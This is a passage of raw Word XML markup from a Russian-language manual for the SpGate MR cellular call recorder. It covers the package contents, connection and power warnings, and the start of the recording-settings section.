            <w:tcW w:w="3261"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130x100x30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="12" w:type="dxa"/>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Вес, г</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261"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195</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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Производитель оставляет за собой право вносить изменения в изделие с целью улучшения его характеристик.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_TOC_250012"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidRPr="00233B41">
        <w:lastRenderedPageBreak/>
        <w:t>Комплектация</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Комплектация регистратора приведена в Таблице 5.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таблица</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Комплектация  сотового</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>регистратора</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>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5267"/>
        <w:gridCol w:w="4079"/>
      </w:tblGrid>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Наименование</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b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Количество</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Сотовый регистратор SpGate MR</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Блок питания</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SD-карта 4Gb</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3"/>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Антенна</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Компакт-диск</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USB-кабель</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Паспорт</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Упаковка</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bl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_TOC_250011"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidRPr="00233B41">
        <w:t>Подключение</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Подключение регистратора показано на рисунке 6.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658752" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1358900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>319405</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5120640" cy="2598420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="17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064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433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис 6.1 Подключение сотового регистратора </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SpGate</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4608"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Установите регистратор, учитывая  уровень  сигнала  сотовой  сети GSM (индикатор NET). Перед подключением регистратора отключите защиту SIM-карты</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PIN-кодом.</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Адаптер питания предназначен для работы от сети 220В.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Нормальная </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">работа </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">сотового регистратора гарантируется </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">только </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">при </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">использовании заводских комплектующих. Использование других комплектующих может привести к некачественной работе  регистратора  либо  его поломке. Например, при использовании обычной малогабаритной антенны в </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>зоне со слабым сигналом может наблюдаться плохое качество приема, или  в звуке могут присутствовать</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>помехи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Внимание! </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Перед установкой или извлечением </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SIM</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-карты выключите регистратор, иначе это может повлечь за собой неисправность </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SIM</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-карты и регистратора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Внимание! </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>При необходимости замены источника питания допускается использование стабилизированных блоков питания постоянного тока с напряжением 12В и током не менее 1А с  обязательным  соблюдением  полярности (центральный вывод разъема должен быть</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="31"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>«+»).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="2837"/>
          <w:tab w:val="left" w:pos="3617"/>
          <w:tab w:val="left" w:pos="5657"/>
          <w:tab w:val="left" w:pos="6045"/>
          <w:tab w:val="left" w:pos="7901"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Внимание!</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>При</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>п</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>одключении</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>к</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>компьютеру</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">сотовый </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>регистратор не обрабатывает входящие и исходящие</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>звонки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="009576B9" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_TOC_250010"/>
      <w:r w:rsidRPr="009576B9">
        <w:t>Запись</w:t>
      </w:r>
      <w:r w:rsidRPr="009576B9">
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidRPr="009576B9">
        <w:t>разговоров</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="009576B9" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_TOC_250009"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="009576B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройки</w:t>
      </w:r>
      <w:r w:rsidRPr="009576B9">
        <w:rPr>
          <w:spacing w:val="4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidRPr="009576B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>записи</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1331"/>
          <w:tab w:val="left" w:pos="1389"/>
          <w:tab w:val="left" w:pos="1497"/>
          <w:tab w:val="left" w:pos="2931"/>
          <w:tab w:val="left" w:pos="3416"/>
          <w:tab w:val="left" w:pos="3908"/>
          <w:tab w:val="left" w:pos="4191"/>
          <w:tab w:val="left" w:pos="5585"/>
          <w:tab w:val="left" w:pos="5664"/>
          <w:tab w:val="left" w:pos="5717"/>
          <w:tab w:val="left" w:pos="5792"/>
          <w:tab w:val="left" w:pos="6362"/>
          <w:tab w:val="left" w:pos="6774"/>
          <w:tab w:val="left" w:pos="6829"/>
          <w:tab w:val="left" w:pos="7129"/>
          <w:tab w:val="left" w:pos="7225"/>
          <w:tab w:val="left" w:pos="7605"/>
          <w:tab w:val="left" w:pos="7643"/>
          <w:tab w:val="left" w:pos="7942"/>
          <w:tab w:val="left" w:pos="8106"/>
          <w:tab w:val="left" w:pos="8380"/>
          <w:tab w:val="left" w:pos="8517"/>
          <w:tab w:val="left" w:pos="8735"/>
          <w:tab w:val="left" w:pos="9157"/>
          <w:tab w:val="left" w:pos="9527"/>
          <w:tab w:val="left" w:pos="9616"/>
          <w:tab w:val="left" w:pos="9896"/>
          <w:tab w:val="left" w:pos="9990"/>
          <w:tab w:val="left" w:pos="10129"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>корневой</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>папке</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>устройство</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>создает</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>файл</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>cfg.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>В</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">этом </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>файле содержатся настройки  устройства с  их описанием.</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
